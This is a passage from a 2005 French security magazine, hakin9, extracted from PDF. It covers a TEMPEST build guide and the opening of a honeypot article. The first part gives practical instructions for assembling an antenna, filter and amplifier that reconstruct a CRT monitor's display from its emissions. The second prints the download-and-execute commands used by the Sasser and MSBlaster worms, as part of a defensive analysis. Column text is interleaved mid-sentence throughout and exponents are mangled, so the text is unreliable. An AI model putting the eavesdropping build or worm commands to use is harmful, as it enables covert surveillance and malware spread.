masses respectives, plus 2 canaux (plus le voltage est élevé, plus le
de synchronisation pour le balayage pixel est lumineux) à l’endroit du
vertical et horizontal, et la masse balayage (cette tension est donc
commune aux signaux de synchro- amenée à varier à chaque nouveau
nisation. pixel de couleur différente ; pour
Les signaux de synchronisation, un écran de résolution 800*600
qui indiquent le passage à la ligne avec un rafraîchissement de 70
suivante ou le retour du faisceau au Hz, les changements de tensions
début de l’écran, sont de simples dif- peuvent aller à une fréquence de
férences de potentiels de quelques 800*600*70=34 MHz, soit 34 000
volts. Ils ont lieux (pour un écran 000 de fois par seconde).
d’une résolution de 800*600 pixels
avec un rafraîchissement de 70 Hz) Le phénomène d'induction
70 fois par seconde pour les signaux La moindre différence de potentiel
www.hakin9.org hakin9 N o 3/2005

Figure 6. Un modèle d'antenne
parabolique
(c'est-à-dire, quand une quantité de
tension électrique monte ou des-
cend) dans un matériau électrique-
ment conducteur produit une onde
électromagnétique proportionnelle
au potentiel : ceci est appelé phé-
nomène d'induction (voir Figure 4).
Ce comportement est décrit par les
équations de Maxwell. Il n'est cepen-
dant pas nécessaire de comprendre
toutes les règles mathématiques
et physiques derrière ça pour exploi-
ter le phénomène.
Le phénomène inverse est éga-
lement vrai : une onde électroma-
gnétique rencontrant un matériau
conducteur produira une différence
de potentiel proportionnelle à la
force de l'onde. C'est globalement
comme ça que marchent les récep-
teurs radio GO : plus l'onde est forte,
plus le signal reçu est important.
Pour qu'un champ électroma-
gnétique soit créé, il doit y avoir
des différences de potentiels :
un voltage constant ne produira
aucune onde radio. De la même
manière, aucun signal ne peut être
reçu si le champ magnétique est
statique (c'est pour ça que les dy-
namos doivent constamment être
en mouvement pour produire de
l'électricité).
Application
aux moniteurs CRT
Avant d'être projeté sous la forme
d'un flux d'électrons, le signal vidéo
est amplifié à un voltage élevé.
Cette amplification génère de fortes
ondes électromagnétiques, qui, si
le moniteur n'est pas protégé suf-
fisamment électromagnétiquement,
peuvent être capturées jusqu'à une
hakin9 N o 3/2005
Émissions compromettantes
distance d'une centaine de mètres
sans aucun contact physique en
utilisant une antenne. La force
de l'onde est proportionnelle au
contraste entre deux pixels con-
sécutifs. Bien sur, comme les trois
composants de la couleur sont trai-
tés simultanément et qu'une seule
onde électromagnétique est émise
(pour être plus précis, les ondes
électromagnétiques se mélangent
en une seule quand elles sont émi-
ses), on ne peut espérer retrouver
les informations de couleur.
Monter
un système TEMPEST
Un écran d'exemple, son codage
électrique correspondant et son
induction électromagnétique peu-
vent être trouvés en Figure 5. Sur
la gauche, on peut observer une
échelle de dégradé sur un écran
moniteur. L'image centrale montre
le même signal vidéo analysé par
un oscilloscope. Enfin, l'image
de droite montre l'émission élec-
tromagnétique correspondante
(proportionnelle aux différences de
potentiels). Un motif vertical a été
utilisée pour plus de clarté (toutes
les lignes sont codées de la même
manière).
Ce motif a pour but de compren-
dre quel genre de signal nous allons
étudier. Commençons maintenant
la partie pratique de notre jeu de
détective.
L'antenne
Une antenne peut être un simple
câble conducteur ; cela sera suffi-
sant si on veut faire l'expérience du
Figure 7. Schéma d'un filtre passe-haut
www.hakin9.org
système à deux ou trois mètres du
moniteur. Pour de plus grandes dis-
tances il faudra utiliser une antenne
parabolique (Figure 6), qui devra
être pointée vers le périphérique
d'affichage ; elle est extrêmement
sensible et directionnelle, c'est-à-
dire qu'elle peut capturer même de
très faibles émissions à partir d'un
point précis de l'espace.
L'antenne va capturer un signal
très parasité. Ce bruit est dû à la
pollution électromagnétique de l'en-
vironnement (divers émissions ra-
dios). Heureusement les moniteurs
émettent dans une bande restreinte
de hautes fréquences, ce qui nous
permet de récupérer le signal en
utilisant un filtre.
Filtrage
Pour récupérer le signal, nous devons
filtrer toutes les fréquences inférieu-
res à la fréquence d'un seul pixel (ceci
élimine également l'onde générée par
le signal de synchronisation, qui rend
difficile la récupération du début des
lignes). En fait, pour de meilleurs
résultats, il est bon de laisser une
marge et de mettre la fréquence de
filtrage légèrement inférieure à la fré-
quence d'un seul pixel.
Pour un écran de résolution
800*600 à un taux de rafraîchis-
sement de 70 Hz, la fréquence
critique serait de 800*600*70=33.6
Mhz. Un filtre passe-haut est com-
posé d'une résistance et d'un con-
densateur, assemblé comme sur la
Figure 7 :
• C1 – le condensateur,
• R1 – la résistance,
43
 Figure 8. Amplificateur opérationnel : un montage inverseur
• Ue, Us – entrée et sortie respec-
tivement,
• Y1 pour le signal résultant.
La fréquence critique du système
est déterminée par fc=1/(2*π*R*C),
avec fc la fréquence critique (fré-
quence en dessous de laquelle le
filtre coupera tout signal), R pour la
valeur de la résistance et C pour la
capacité du condensateur.
Nous pourrions configurer le sys-
tème pour disons une fréquence de
1.6 MHz (donc toutes les fréquences
inférieurs a 1.6 MHz sont éliminées),
ce qui nous conduit à 1.6*106 =1/
(2*π*R*C). De cette manière R*C=1/
(2*π*1.6*106)=10 -7.
Cette fréquence a été choisie car
elle laisse une bonne marge, et les
condensateurs et résistances pour
cette fréquence sont faciles à trou-
ver. Pour arriver à ce produit, nous
pourrions choisir un condensateur
de 1 nF (1 nano Farad, équivalent
à 10 -9 Farad) et une résistance de
100 Ω (100 Ohms).
On arrive à 10 -9*102 =10 -7, donc
nous avons notre produit, et le sys-
tème est configuré pour la fréquence
Attaque
critique de 1.6 MHz. Bien sur vous
Figure 9. Une diode, telle que
représentée dans les circuits
électroniques
44
pouvez utiliser n'importe quelle autre
combinaison de résistances et con-
densateurs, tant que le produit reste
constant.
Amplification
Le signal filtré a un potentiel très
bas (quelques mV). Pour exploiter
le signal nous devons l'amplifi er
(c'est-à-dire multiplier le voltage
par un facteur constant) à un ni-
veau acceptable. Comme vu plus
haut, le signal vidéo est compris
entre 0 V et 0.7 V. Pour arriver
à ça nous allons utiliser un amplifi -
cateur opérationnel (AO, voir aussi
l'Encadré Sur le réseau), qui est un
composant électronique trouvable
pour une dizaine d'euros.
Comme nous traitons des hau-
tes fréquences (MHz), nous devons
faire attention en choisissant cet
amplificateur opérationnel : les AO
classiques ne peuvent pas traiter de
telles fréquences. Au magasin, vous
devez donc demander un amplifica-
teur opérationnel vidéo. Le modèle
AD844AN est un exemple, cepen-
dant il n'est pas forcément disponible
dans tous les pays. Il faut regarder
les catalogues des différents fournis-
seurs d'électronique.
Un AO a beaucoup d'applica-
tions ; mais nous voulons juste am-
plifier notre signal en ce moment.
Pour y arriver, référons nous au
circuit montré en Figure 8. Il est com-
posé d'un AO et 2 résistances :
www.hakin9.org
• R2, R3 – résistances,
• OA – amplificateur opérationnel,
• V+, V- – alimentation de l'AO,
• Ue, Us – entrée et sortie,
• Y1 – signal résultant.
Il est appelé inverseur et c'est le plus
simple circuit d'amplification à mon-
ter (mais voir également l'Encadré
Les choses à se rappeler lorsqu'on
amplifie le signal). La valeur des
deux résistances déterminera le
Les choses à se rappe-
ler lorsqu'on amplifie le
signal
Nous devons garder certaines choses
en tête. D'abord, il est pratique de
choisir une résistance R3 variable, de
cette manière nous pouvons choisir le
coefficient même quand le circuit est
assemblé. Plus important, l'AO doit être
alimenté ! C'est quelque chose auquel
il faut porter attention lorsqu'on choisit
l'AO, car ils n'ont pas tous les mêmes
besoins en terme d'alimentation. Géné-
ralement c'est autour de 12 V ou 15 V.
Il faut également s'assurer de savoir
monter un AO avant de l'assembler.
Différents documents sont disponibles
sur Internet à ce sujet (voir l'Encadré
Sur le réseau). Dernier point, le circuit
est appelé inverseur car il inverse la
sortie (c'est pour ça que k est négatif).
Avec les ondes électromagnétiques
ce n'est pas un problème, car chaque
signal possède une partie négative
et une partie positive.
hakin9 N o 3/2005
 Émissions compromettantes

Figure 10. SUB-D HD Connector Figure 11. SCART – Schéma de connectivité Péritel

Figure 12. Le circuit convertisseur de synchronisation de Tomi Engdahl's

hakin9 N o 3/2005 www.hakin9.org 45

 Assemblage du système
Notre circuit électronique est constitué de 4 blocs (voir la Figure 14) :
• une antenne (A) qui recevra le signal,
• un filtre passe-haut (C1,R1) pour couper les fréquences inférieures à la fréquence
critique que nous avons définie,
• une amplificateur (OA,R2,R3,V+/V-) qui amplifie le signal filtré afin de le visualiser
sur un écran CRT standard,
• une diode pour couper les parties négatives (qui ne peuvent pas être exploitées
par un écran standard) et finalement une sortie pour avoir le signal vidéo sur
l'écran.

Parallèlement, on envoie des signaux de synchronisation. Ils peuvent être générés par
deux générateurs basse fréquences ou directement par une carte vidéo.
Pour visualiser les informations sur un écran TV, le circuit de conversion des si-
gnaux de synchronisation de Tomi Engdahl peut être utilisé (Figure 12). Comme nous
n’avons pas vraiment besoin de ce dispositif, une description est disponible à cette
adresse : http://www.hut.fi /Misc/Electronics/circuits/vga2tv/vga2palntsc.html.

Les composants
En pratique, on peut utiliser une multiplaque (Figure 13 ; 1) pour construire le circuit.
C'est une planche avec une grille de trous liés par des lignes de cuivre, donc vous
n'avez pas besoin de faire votre propre circuit imprimé – il est déjà prêt à l'emploi. Ce
genre de planche est disponible dans n'importe quelle boutique d'électronique.
Une résistance et une diode sont montrées sur la Figure 13 (respectivement 2, 3).
Pour les condensateurs, il y en a plusieurs genres disponibles, mais ça revient au mê-
me (Figure 13 ; 4, 5, 6). Enfin, l'amplificateur opérationnel (Figure 13 ; 7) est nécessaire
– pour l'instant nous n'avons pas besoin de plus d'explication, mais vous pouvez vous
référer à la page de Harry Lythall's pour les détails (http://web.telia.com/~u85920178/
begin/opamp00.htm). Tous ces composants sont disponibles pour quelques euros
chacun.

Figure 13. Éléments utilisés dans
l'assemblage du circuit TEMPEST :
1 – une multiplaque ; 2 – une
résistance ; 3 – une diode ; 4, 5, 6
– condensateurs ; 7 – amplificateur
opérationnel
coefficient d'amplification par la
formule suivante : k = - R3/R2. Pour
amplifier une centaine de fois, on
peut choisir par exemple R2=1 Ω
et R3=100 Ω.
Couper la composante
négative
C'est la partie la plus facile : elle con-
siste juste à rajouter une diode pour
Attaque
L'assemblage
Pour assembler le circuit complet, vous aurez besoin d'un fer à souder (même un mo-
dèle simple sera suffisant) et du fil d'étain pour souder les composants électroniques
à la multiplaque.
Insérez chaque composant électronique au dos de la multiplaque (c'est-à-dire, le
coté sans cuivre) de manière à ce que les pattes apparaissent de l'autre coté. Appli-
quez alors l'étain sur le cuivre avec le fer à souder – une goutte d'étain viendra souder
la patte du composant électronique au cuivre.
Utilisez les circuits de cuivre comme vous le sentez, tant que vous respectez
les connections comme montré sur le schéma du circuit TEMPEST (Figure 14).
Vous pouvez lier deux lignes de cuivres en soudant un câble électrique d'une ligne
à l'autre.
de ces problèmes dépend du ma- de 70 Hz, 70 impulsions par secon-
tériel utilisé. L'étape finale inclut les des doivent être générées pour le
signaux de synchronisation et un premier canal, et 600*70=42000
périphérique d'affichage. impulsions par secondes doivent
être générées pour le second ca-
Les signaux de nal.

couper la partie négative du signal synchronisation Si on ne dispose pas de géné-

(votre périphérique d'affichage aura
quelques difficultés à reproduire des
couleurs négatives). Le schéma est
montré sur la Figure 9.
Restituer l'affichage
Il reste deux choses pour avoir un
système fonctionnel – la résolution
Ces signaux peuvent être générés
en utilisant des générateurs de
fréquence. Il faut générer des im-
pulsions de quelques volts pour la
synchronisation verticale (chaque
ligne). C'est-à-dire, pour un écran
d'une résolution de 800*600 avec
une fréquence de rafraîchissement
rateur de fréquence, on peut alors
utiliser une astuce simple : dériver la
voie de synchronisation d’une sortie
vidéo d’un ordinateur (voir Figure 10).
Il suffira de régler au préalable l’or-
dinateur sur le taux de rafraîchisse-
ment voulu (dans notre exemple,
800*600, 70 Hz). Pour connecter

46 www.hakin9.org hakin9 N o 3/2005


Figure 14. Système TEMPEST de Robin Lobel
l'écran test au port de sortie vidéo,
nous pouvons disséquer un vieux ca-
ble vidéo ou acheter un connecteur
SUB-D 15/HD 15 (aussi connu com-
me connecteur VGA 15 broches).
Regardons la Figure 10 et les
signaux correspondants :
• 1 – rouge,
• 2 – vert,
• 3 – bleu,
• 6 – masse du rouge,
• 7 – masse du vert,
• 8 – masse du bleu,
• 11 – masse,
• 13 – synchronisation horizontale,
• 14 – synchronisation verticale.
Notez bien : il faut rester très vigilant
en travaillant sur le port de sortie
vidéo. La moindre erreur peut être
fatale à la carte vidéo.
Le périphérique d'affichage
Pour visualiser les informations dé-
tournées, on peut utiliser au choix un
écran de télévision ou d’ordinateur,
bien qu’un écran d’ordinateur soit
préférable car l’écran de télévision ne
supportera pas toutes les résolutions,
contrairement à celui d’ordinateur (jus-
qu'à certaines limites bien entendu).
Pour ce qui est de la connectivité
avec l’écran d’ordinateur, il faut se
référer au schéma du connecteur
SUB-D HD (Figure 10). Pour un
hakin9 N o 3/2005
Émissions compromettantes
écran télé, on se référera au schéma
du connecteur SCART comme mon-
tré sur la Figure 11 :
• 5 – masse du bleu,
• 7 – bleu,
• 9 – masse du vert,
• 11 – vert,
• 13 – masse du rouge,
• 15 – rouge.
L'utilisation d'un poste télé pose un
peu plus de problèmes. Convertir
les signaux de synchronisation est
assez dur. Heureusement, en 1996
Tomi Engdahl a réalisé un circuit qui
converti les standards VGA en stan-
dards TV. Le principe est expliqué ici
sur la Figure 12.
Comme on peut le voir, cela reste
relativement facile si vous possédez
un écran d’ordinateur. Mais nous
devons veiller à rester vigilant ! Ces
appareils sont très sensibles. Il est
donc recommandé d’utiliser un os-
cilloscope pour contrôler durant les
manipulations.
C’est à peu prés tout (voir l'Enca-
dré Assemblage du système pour les
détails de la constructions).
Pour résumer, le système TEM-
PEST complet peut être vu sur la
Figure 14. Pour clarifier :
• A – antenne,
• C1 – condensateur,
www.hakin9.org
• R1,R2,R3 – résistance,
• OA – amplificateur opérationnel,
• V+/V- – alimentation de l'AO,
• 1,2,3 – canaux de couleur,
• 4,5 – canaux de synchronisation,
• Sync – générateur de signaux de
synchronisation.
Et ça marche ?
Nous savons maintenant comment
construire un système TEMPEST
– on est donc en mesure de construi-
re son propre système d’interception
d’ondes EM. Cependant, ne vous
attendez pas à un succès immédiat
lors de vos premiers essais. C’est
un système très délicat qui demande
à être finement réglé afin de bien
fonctionner, et il serait judicieux
d’avoir un oscilloscope à portée de
main pendant les essais.
Les résultats sont aussi forte-
ment dépendants de l’environnement
et des conditions dans lesquelles
se déroulent les expériences. Les
émissions électromagnétiques des
moniteurs CRT varient d’un écran
à l’autre, donc même avec un dis-
positif bien réglé, les résultats varie-
ront. Notre système est un montage
artisanal, relativement bon marché
et simple. Les systèmes TEMPEST
industriels sont chers et durs à ac-
quérir, notamment à cause la classi-
fication de ces informations pendant
un long moment. n
47
 Honeypots – leurre
contre les vers
Michał Piotrowski
E
n dépit de toutes ses qualités, l'usage
universel des techniques Internet dans
les affaires peut s'avérer dangereux
pour les données traitées. Parmi les dangers
qui menacent nos systèmes informatiques figu-
rent les virus et les vers de réseau dont le but
principal est de se multiplier et de se propager
– c'est-à-dire attaquer et contaminer le plus
grand nombre d'ordinateurs possible. La stra-
tégie de leur fonctionnement est très simple :
trouver et prendre le contrôle d'un système vul-
nérable, et ensuite, à l'aide de celui-ci, scanner
le réseau et attaquer d'autres machines.
Chaque machine contrôlée par ce pro-
gramme malicieux devient à son tour un
agresseur prêt à s'attaquer tant à un ordina-
teur personnel qu'aux systèmes d'une grande
entreprise ou d'une institution d'état. De plus,
Défense
chaque virus ou ver, en plus de ses fonctions
de multiplication, peut être doté de fonctions
de destruction pouvant abîmer les données
dans les systèmes attaqués, et même le
matériel informatique. Il arrive que les vers
de réseau soient créés et utilisés par les
crakers pour effectuer des attaques DDoS
contrôlées. Les programmes de ce type
– après la contamination d'un nombre donné
48 www.hakin9.org
Les vers de réseaux se propagent
très rapidement – afin de pouvoir
se défendre efficacement, il faut
avoir leur code et l'analyser. Les
systèmes honeypots permettent
non seulement de capturer
un ver, mais aussi d'observer
ses actions et de le supprimer
automatiquement des machines
infectées.
de systèmes, après un temps donné ou à la
commande de l'intrus – commence une atta-
que DoS sur une cible déterminée, ce qui, vu
la grande quantité d'instances du virus, peut
rendre impossible le travail des systèmes
et des réseaux de la victime.
D'après les recherches effectuées au
début 2004 par la société Sandvine, les con-
nexions générées par les vers constituent de
2% jusqu'à 12% de tout le trafi c réseau sur
Internet. Rien qu’aux États Unis, une telle
exploitation de la bande passante coûte aux
Cet article explique...
• comment, à l'aide des honeypots, intercepter les
vers de réseau,
• comment exploiter les machines virtuelles pour
guérir les ordinateurs infectés.
Ce qu'il faut savoir...
• le système Linux et Windows,
• le langage de script Bash,
• au moins les notions de base des protocoles
réseau.
hakin9 N o 3/2005
 Honeypots – leurre contre les vers

fournisseurs de services Internet

Classification des honeypots environ 245 000 000 de dollars
Suivant la classifi cation générale, les honeypots – c'est-à-dire, les leurres si- par an. C'est une somme vraiment
mulant le fonctionnement d'un système réel – peuvent être divisés en systèmes impressionnante. Selon les estima-
à faible (en anglais low-interaction) et à forte interaction (en anglais high-inte- tions de la société Trend Micro (l'un
raction). Le terme niveau d'interaction définit le type d'actions qui peuvent être des plus grands éditeurs de pro-
effectuées par l'intrus dans le système, et de cela, il définit le nombre et la qualité
grammes anti-virus) en 2003, les
des informations pouvant être stockées à l'aide du piège, la dépense de travail
pertes causées par les attaques
nécessaire pour l'installer et le niveau de danger lié à l'interception éventuelle du
des programmes malicieux dans le
honeypot par l'assaillant.
Les honeypots à faible interaction, le plus souvent ne sont pas des systèmes de monde entier représentaient envi-
pleine valeur, mais des programmes qui émulent les services ou les systèmes. Cela ron 55 000 000 000 de dollars.
signifie que le pirate qui se connecte à un tel ordinateur peut établir la connexion Analysons donc les façons de
avec le port TCP voulu (par exemple avec le service FTP), obtenir le message ap- lutter contre les vers à l'aide des
proprié informant sur le type et la version du faux serveur et y envoyer les données. honeypots (les machines virtuelles
Parfois, il peut ouvrir une session anonyme, exécuter certaines commandes, voire – leurres ; cf. l'Encadré Classifi -
consulter le système de fichiers virtuel souhaité. Mais il ne sera jamais capable de cation des honeypots). Prenons
faire plus que le honeypot ne le permet, par exemple, il n'aura jamais accès au shell comme exemples deux programmes
système.
malicieux, très connus depuis quel-
En cela, les systèmes à faible interaction sont faciles à installer, maintenir
ques temps – MSBlaster et Sasser
et exploiter. Ils sont aussi difficiles à intercepter par un pirate parce qu'ils n'offrent
(cf. l'Encadré Quelques attaques
pas de services réels. Malheureusement, ils ont deux grands défauts : les infor-
mations sur l'attaque provenant de ces honeypots sont assez limitées et il est très célèbres des vers de réseau). Tout
facile de les détecter par un intrus expérimenté. Mais utilisés de façon appropriée d'abord, nous essayerons d'obtenir
ils peuvent s'avérer fort utiles, surtout dans la lutte contre les vers et les virus qui un fichier exécutable contenant leur
effectuent des attaques automatiques, selon un algorithme déterminé. code, et ensuite, nous nettoierons
automatiquement les machines in-
fectées. Ces méthodes et program-
mes sont exploités par les éditeurs
Quelques attaques célèbres des vers des programmes anti-virus et les
de réseau spécialistes qui s'occupent de l'ana-
lyse du code des vers et des virus.
CodeRed
Le ver CodeRed qui est apparu pour la première fois en juillet 2001, a contaminé plus Tous les exemples sont basés sur la
de 250 000 ordinateurs pendant les premières 8 heures du fonctionnement. distribution Gentoo Linux et le pro-
gramme Honeyd version 0.8b.
MSBlaster
Le ver MSBlaster, connu aussi comme Lovsan ou Blaster, a débuté sur Internet le Mode de
11 août 2003 et pendant à peine 24 heures, il a infecté environ 200 000 ordinateurs
possédant le système d'exploitation Windows 2000 et XP. La vitesse maximale de la
fonctionnement des
propagation de ce ver était de 68 000 contaminations par heure. De nouveaux cas vers de réseau
d'infections se produisent jusqu'à maintenant, et le nombre de tous les systèmes con-
taminés par MSBlaster est estimé à environ 450 000. Pour lutter efficacement contre les
vers informatiques, il faut savoir
MyDoom comment ils fonctionnent et quels
En février 2004, le ver portant le nom MyDoom a attaqué les serveurs de la société
mécanismes ils utilisent. Bien que
SCO Group. Ils étaient inaccessibles pendant environ 7 jours, et SCO offrait 250 000 $
nous ne nous occupions que de deux
à toute personne aidant à retrouver le ou les créateurs du ver. MyDoom a été considéré
le ver le plus dangereux et le plus rapide dans l'histoire. Selon certains FAI, les lettres
parasites, il ne faut pas oublier que le
envoyées par ce parasite constituaient environ 30% de tout le courrier électronique mode de fonctionnement de tous les
envoyé lors de sa propagation maximale. vers est similaire et se compose de
trois étapes :
Sasser
Le 30 avril 2004, le ver appelé Sasser est apparu. Avec ses variantes successives
• l'infection (en anglais infection),
qui apparaissaient dans les premiers jours du mois de mai, il a infecté 1% de tous
• la propagation (en anglais propa-
les ordinateurs dans le monde entier, c'est-à-dire environ 6 000 000 de postes.
Il a causé de dommages importants dans plusieurs entreprises, tant internationa- gation),
les que locales, et parmi les utilisateurs privés. Les informations sur l'attaque sont • la charge finale (en anglais pay-
parues dans la presse et à la télévision. Plusieurs entreprises et institutions ont dé- load).
cidé de débrancher leurs systèmes informatiques dans la crainte d'une attaque de
Sasser qui, de même que MSBlaster, s'attaquait aux systèmes Microsoft Windows Les Figures 1 et 2 illustrent les pha-
2000 et XP. ses successives du fonctionnement
des vers.

hakin9 N o 3/2005 www.hakin9.org 49

 Infection
L'infection est une étape pendant
laquelle le ver prend le contrôle du
système vulnérable. Pour ce faire,
MSBlaster exploite l'erreur de dé-
passement de tampon dans le sous-
système d'appels de procédures
distantes (en anglais Remote Proce-
dure Call) du système Windows avec
les programmes Distributed Compo-
nent Object Model (DCOM) installés.
L'exploitation efficace de cette faille
permet d'exécuter des commandes
quelconques sur l'ordinateur attaqué.
MSBlaster, en choisissant de façon
aléatoire des adresses IP, recherche
les ordinateurs vulnérables et s'atta-
que au service RPC (écoutant le port
135 TCP).
Figure 1. Phases successives du fonctionnement du ver Blaster Sasser fonctionne de façon si-
milaire, mais il s'attaque au service
LSASS (en anglais Local Security
Authority Subsystem Service) écou-
tant le port 445 TCP. Exploitant
l'erreur de débordement de tam-
pon, Sasser contraint le système
attaqué à exécuter les commandes
envoyées.
Il faut prêter attention au fait que
dans le cas des vers dont nous par-
lons, le processus de contamination
se fait automatiquement. Aucune
coopération de la part de l'utilisateur
du système n'est exigée. Il suffit que
l'ordinateur avec le service vulnéra-
ble soit accessible et accepte les
connexions réseau.

Propagation
Le processus de propagation est une
Figure 2. Phases du fonctionnement du ver Sasser phase du transfert du ver à partir de
l'ordinateur infecté vers les systèmes
Listing 1. Les commandes exécutées par Sasser dans le système attaqués. Le plus souvent, elle con-
infecté siste à distribuer des copies du ver
dans les pièces jointes du courrier
echo off électronique ou à exploiter les vulné-
echo open <IP_du_système_source> 5554>>cmd.ftp
rabilités des services.
echo anonymous>>cmd.ftp
Après l'attaque sur un ordina-
Défense

echo user>>cmd.ftp
echo bin>>cmd.ftp teur vulnérable, MSBlaster lance le
echo get <numéro>_up.exe>>cmd.ftp processus de shell écoutant le port
echo bye>>cmd.ftp 4444 TCP. En même temps, dans
echo on
le système source, il démarre le
ftp -s:cmd.ftp
<numéro>_up.exe
serveur TFTP et, tout en se connec-
echo off tant au shell de l'ordinateur attaqué,
del cmd.ftp il exécute les commandes qui char-
echo on gent le programme du ver à partir
du système origine et le lancent

50 www.hakin9.org hakin9 N o 3/2005

 Honeypots – leurre contre les vers

Charge d'un ver

Honeyd La charge d'un ver est une action
Le programme Honeyd, créé et développé par Niels Provos, sert à construire des optionnelle, non liée au processus
systèmes à faible interaction autant très simples que très complexes. Son avantage d'infection et de propagation, exé-
principal est la possibilité d'émuler un réseau informatique entier, composé de diffé- cutée par le ver dans le système
rents systèmes d'exploitation virtuels qui sont capables de fournir des services fictifs contaminé. Dans la plupart des
voulus. cas, elle a un caractère destructif
Le principe du fonctionnement du programme Honeyd est très simple : au moment et peut entraîner la suppression ou
où l'intrus essaie de se connecter à l'adresse IP qui est affectée au système émulé,
la modifi cation des fi chiers, le for-
Honeyd se fait passer pour ce système et commence la communication avec l'ordina-
matage des disques durs ou l'exé-
teur de l'intrus. Évidemment, l'environnement réseau sur lequel il est utilisé doit être
cution de l'attaque DoS sur des
configuré de façon à ce que les paquets IP ayant les adresses cibles déterminées
parviennent au système-piège. Nous pouvons le faire en configurant les chemins de ressources Internet déterminées.
traçage appropriés sur le routeur. Il est aussi possible d'appliquer la technique ARP Les vols des mots de passe de dif-
Spoofing permettant de falsifier les réponses aux requêtes ARP et de se faire passer férentes ressources, par exemple
pour un autre ordinateur, même inexistant. de comptes du courrier électroni-
Une autre caractéristique très importante du programme Honeyd est la possi- que, ne sont pas rares non plus.
bilité de profiler les ordinateurs virtuels conformément à la base de signatures du MSBlaster lance les attaques
programme Nmap et configurer les services émulés de façon très souple. Honeyd, DoS sur le site Web de Microsoft
une fois que la connexion entre l'ordinateur de l'intrus et la machine virtuelle est éta- – http://www.windowsupdate.com
blie, peut transmettre la communication à un programme quelconque ou un script
un jour précis du mois, par contre
extérieur qui, à partir de ce moment, recevra et enverra les données au système de
Sasser redémarre le système d'ex-
l'intrus. De plus, la connexion peut être transmise à un serveur réel fournissant un
ploitation.
service déterminé, et même à l'ordinateur de l'attaquant (à partir de l'adresse source
chargée des paquets IP provenant de ce dernier).
Construction
d'un faux réseau
(le fichier exécutable portant le nom à l'aide d'un exploit, il lance le Le piège que nous utiliserons pour
msblast.exe) : shell attendant la connexion sur le capturer et supprimer les vers est
port TCP 9996. Ensuite, dans le un système à faible interaction (cf.
tftp <IP_du_système_source> § système source, Sasser démarre l'Encadré Classifi cation des honey-
GET msblast.exe le serveur FTP écoutant le port pots), basé sur Linux et le program-
start msblast.exe 5554 et envoie les commandes me Honeyd (cf. l'Encadré Honeyd).
à la machine cible (cf. le Listing 1). Mais avant de passer à la cons-
Ensuite, le programme lancé com- Ces commandes ont pour le but de truction de notre propre honeypot,
mence le processus de contami- charger et lancer le fichier exécuta- il faut prendre connaissance des
nation. ble du ver (le fichier s'appelle <nu- possibilités de ce programme. En-
La propagation du ver Sasser est méro>_up.exe, où <numéro> est un visageons le réseau présenté sur la
similaire : dans l'ordinateur attaqué, nombre aléatoire). Figure 3 (pour le construire, il faut
confi gurer Honeyd de la façon pré-
sentée sur le Listing 2).
Configuration du comportement des protocoles La compilation de Honeyd ne
TCP, UDP et ICMP dans Honeyd diffère pas des standards admis.
Tout d'abord, il faut décompresser
Le protocole TCP :
les archives contenant le code
• open – établir la connexion (comportement standard),
source :
• block – négliger le paquet, ne pas envoyer la réponse,
• reset – répondre par le paquet RST,
• tarpit – retarder la connexion (sert à ralentir la communication et peut occuper $ tar zxf honeyd-0.8b.tar.gz
les ressources de l'ordinateur de l'attaquant).
Ensuite, nous compilons et installons
Le protocole UDP : le programme (pour que la compila-
• open – répondre, tion réussisse, nous avons besoin
• block – ne pas répondre,
des bibliothèques libevent, libdnet
• reset – répondre par le paquet ICMP Port unreachable (comportement stan-
et libpcap) :
dard).

Le protocole ICMP : $ cd honeyd-0.8b

• open – répondre par le paquet ICMP approprié, honeyd-0.8b$ ./configure
• block – négliger le paquet et ne pas répondre (comportement standard). honeyd-0.8b$ make
honeyd-0.8b# make install

hakin9 N o 3/2005 www.hakin9.org 51


Figure 3. L'exemple d'un réseau construit à l'aide du programme Honeyd
Les systèmes virtuels créés par le
programme Honeyd sont les profi ls
des ordinateurs. Ces profi ls possè-
dent ses caractéristiques, comme
type de système d'exploitation,
ports ouverts ou comportement
des services émulés. Dans notre
exemple, il existe trois profi ls :
linux, décrit dans les lignes de
1 à 6, freebsd entre les lignes 8
à 11, et windows, à partir de la ligne
13 jusqu'à 19. Dans les lignes 21,
22 et 23, les profi ls sont associés
respectivement aux adresses
10.0.0.10, 10.0.0.11 et 10.0.0.12.
En résultat, quand Honeyd reçoit
un paquet dirigé à l'une de ces
adresses, il utilisera le profi l asso-
cié et répondra conformément à sa
confi guration.
Chaque profil possède les para-
mètres de configuration permettant
de déterminer comment le système
se comportera. Sur le Listing 2, vous
pouvez observer que les lignes 2, 9
et 14 déterminent le type de système
d'exploitation des ordinateurs virtuels
Défense
par la définition du comportement
de leur pile TCP/IP (conformément
à la base de caractéristiques du pro-
gramme Nmap). En effet, si l'intrus
scanne le réseau 10.0.0.0 à l'aide
de ce programme, il trouvera quatre
machines : système honeypot, Linux
2.4 – 2.5, FreeBSD version 2.2.1
et Windows NT 4.0.
52
Configuration du comportement des
protocoles TCP, UDP et ICMP dans
Honeyd). Dans notre exemple, nous
avons choisi l'action reset. Cela
signifie que Honeyd, en réponse
au paquet établissant la connexion
TCP, enverra un paquet qui termine
la communication (RST), par con-
tre, dans le cas du protocole UDP,
il enverra le paquet ICMP informant
que le port est inaccessible. C'est
le comportement typique des ports
fermés sur lesquels aucun service
n'écoute.
L'inscription dans la ligne 15
entraîne le système Windows à ne
pas répondre aux paquets ICMP,
y compris les requêtes ICMP Echo
Request. La ligne 6 dans le profil
linux permet de se connecter au
port TCP 25 qui paraît être un port
Ensuite, il est possible de dé- ouvert. Pourtant, aucune communi-
terminer quels ports TCP et UDP cation via ce port ne sera possible.
seront ouverts et quels services L'inscription dans le profil windows, la
seront émulés. Les lignes 3 et 4 dé- ligne 17 provoque un blocage du port
finissent le comportement par défaut TCP portant le numéro 25 et tous les
de Honeyd au moment où il reçoit paquets y étant destinés seront né-
un paquet TCP ou UDP adressé au gligés. Ce comportement a souvent
système linux sur le port ayant un lieu quand le trafic réseau est filtré
comportement indéfini (cf. l'Encadré par un pare-feu.
Listing 2. Le fichier de configuration config1 du programme Honeyd
pour le réseau présenté sur la Figure 3
1: create linux
2: set linux personality "Linux Kernel 2.4.0 - 2.5.20"
3: set linux default tcp action reset
4: set linux default udp action reset
5: add linux tcp port 80 proxy www.google.com:80
6: add linux tcp port 25 open
7:
8: create freebsd
9: set freebsd personality "FreeBSD 2.2.1-STABLE"
10: add freebsd tcp port 80 §
"sh /usr/local/share/honeyd/scripts/apache-web.sh"
11: add freebsd tcp port 22 §
"sh /usr/local/share/honeyd/scripts/test.sh $ipsrc $dport"
12:
13: create windows
14: set windows personality "Microsoft Windows NT 4.0 Server SP5-SP6"
